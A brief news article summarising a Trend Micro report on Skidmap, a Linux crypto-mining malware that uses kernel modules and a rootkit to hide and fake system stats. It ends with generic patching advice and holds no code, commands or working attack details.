According to a Trendmicro report, crypto-mining malware Skidmap has hit Linux users. This new malware uses loadable kernel modules to sneak into Linux systems and keeps the crypto mining activity under the radar. According to the research, this malware exhibits the increasing complexity of recent cryptocurrency mining threats.
The malware hides its malicious activity by displaying fake network traffic stats. The attacker can use the malware to gain unfettered access to the affected system. Skidmap can also set up a secret master password that gives it access to any user account in the system.
Threat analysts Augusto Remillano II and Jakub Urbanec explained that Skidmap goes to great lengths to disguise itself. It uses IP route module to hide key files and the Netlink rootkit to fake network and CPU statistics. The infection comes via the crontab process, and a script is used to download the Trojan.Linux.SKIDMAP.UWEJX malware.
TrendMicro advised Linux users to adapt to best practices to avoid this malware. It is also recommended to keep the systems and servers updated and patched. Let us know in comments what do you think of this sophisticated malware.